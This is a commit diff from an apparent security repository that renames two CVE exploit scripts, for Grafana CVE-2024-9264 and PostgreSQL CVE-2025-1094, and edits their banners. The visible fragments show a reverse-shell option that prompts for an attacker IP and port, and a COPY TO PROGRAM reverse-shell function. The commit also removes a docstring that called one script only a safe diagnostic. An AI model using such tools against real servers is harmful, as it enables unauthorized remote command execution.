peregr1nus/seckrity-cve
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

File Renamed

Browse Source
This commit is contained in:
Ubuntu
2025-11-05 13:58:08 +00:00
parent 10c5bf252c
commit 7028e15759
2 changed files with 26 additions and 33 deletions
Download Patch File Download Diff File Expand all files Collapse all files

21
CVE-2024-9264/exploit.py → CVE-2024-9264/CVE-2024-9264_Tool.py
View File

@@ -12,16 +12,19 @@ init(autoreset=True)
# ------------------------- # -------------------------
# 프롤로그 # 프롤로그
# ------------------------- # -------------------------
print(r"""
_ __ _____ _____ _____ ___
| | / /|_ _|/ ___||_ _| / _ \
| |/ / | | \ `--. | | / /_\ \
| \ | | `--. \ | | | _ |
| |\ \ _| |_ /\__/ / _| |_ | | | |
\_| \_/ \___/ \____/ \___/ \_| |_/
print(r"""
Edited by : secKrity - 이민준 Edited by : secKrity - 이민준
CVE ID : CVE-2024-9264 CVE ID : CVE-2024-9264
Base Score : 9.4 / CRITICAL
Affected product : Grafana Affected product : Grafana
Vulnerable version : v < 11.0.5+security-01 Vulnerable version : v < 11.0.5+security-01
v < 11.0.6+security-01 v < 11.0.6+security-01
@@ -223,7 +226,7 @@ if __name__ == "__main__":
log_event("Exploit Started") log_event("Exploit Started")
info("Trying to Login...") info("Trying to Login...")
if exploit.login(): if exploit.login():
success("Login Success") info("Login Success")
info("Exploit...") info("Exploit...")
output = exploit.check_vuln() output = exploit.check_vuln()
if output: if output:
@@ -238,7 +241,7 @@ if __name__ == "__main__":
log_event("Exploit with Reverse Shell Started") log_event("Exploit with Reverse Shell Started")
info("Trying to Get Reverse Shell...") info("Trying to Get Reverse Shell...")
if exploit.login(): if exploit.login():
success("Login Success") info("Login Success")
lhost = input("Attacker IP (LHOST): ") lhost = input("Attacker IP (LHOST): ")
lport = input("Attacker PORT (LPORT): ") lport = input("Attacker PORT (LPORT): ")
try: try:

38
CVE-2025-1094/exploit.py → CVE-2025-1094/CVE-2025-1094_Tool.py
View File

@@ -1,15 +1,4 @@
#!/usr/bin/env python3 #!/usr/bin/env python3
# postgres_diagnostic.py
"""
PostgreSQL 취약점 진단 모듈 (CVE-2025-1094 관련 안전 진단)
- 1) 버전확인
- 2) CVE-2025-1094 영향 버전 확인
- 3) '리버스 셸 테스트' (실제 익스플로잇 아님, 환경/설정 안전 진단)
- 4) 종료
주의: 실제 익스플로잇/리버스 코드 제공 불가. 안전 진단만 수행합니다.
"""
import sys import sys
import logging import logging
import re import re
@@ -22,15 +11,17 @@ from psycopg2 import OperationalError
init(autoreset=True) init(autoreset=True)
print(r""" print(r"""
_ __ _____ _____ _____ ___
| | / /|_ __|/ ___||_ __| / _ \
| |/ / | | \ `--. | | / /_\ \
| \ | | `--. \ | | | _ |
| |\ \_| |_ /\__/ / _| |_ | | | |
\_| \_/ \___/ \____/ \___/ \_| |_/
Edited by : secKrity - 이민준
CVE ID : CVE-2025-1095
Edited by : secKrity - 이민준
CVE ID : CVE-2025-1095
Base Score : 8.1 / HIGH
Affected product : PostgreSQL Affected product : PostgreSQL
Vulnerable version : v < 13.19 Vulnerable version : v < 13.19
v < 14.16 v < 14.16
@@ -163,7 +154,6 @@ class PGDiagnostic:
except Exception as e: except Exception as e:
# COPY TO PROGRAM을 실행할 권한이 없거나 다른 오류가 발생할 수 있음 # COPY TO PROGRAM을 실행할 권한이 없거나 다른 오류가 발생할 수 있음
log_event("get_reverse_shell", str(e)) log_event("get_reverse_shell", str(e))
error(f"COPY TO PROGRAM query failed: {e}")
return "" return ""
# ------------------------- # -------------------------
@@ -211,8 +201,8 @@ def print_menu():
def main(): def main():
"""메인 실행 함수""" """메인 실행 함수"""
if len(sys.argv) < 5: if len(sys.argv) < 5:
print("Usage: python3 postgres_diagnostic.py <host> <port> <user> <password> <dbname(optional)>") print("Usage: python3 CVE-2025-1094_Tool.py <host> <port> <user> <password> <dbname(optional)>")
print("Example: python3 postgres_diagnostic.py 127.0.0.1 5432 postgres mypass mydb") print("Example: python3 CVE-2025-1094_Tool.py 127.0.0.1 5432 postgres mypass mydb")
sys.exit(1) sys.exit(1)
host = sys.argv[1] host = sys.argv[1]
@@ -241,8 +231,8 @@ def main():
ver_str_full = pg.get_server_version_string() ver_str_full = pg.get_server_version_string()
if ver_str_full: if ver_str_full:
parsed = parse_pg_version(ver_str_full) parsed = parse_pg_version(ver_str_full)
success(f"Server version string: {ver_str_full}") info(f"Server version string: {ver_str_full}")
success(f"Parsed version: {parsed}") info(f"Parsed version: {parsed}")
else: else:
error("버전 정보를 가져오지 못했습니다.") # warn 대신 error 사용 error("버전 정보를 가져오지 못했습니다.") # warn 대신 error 사용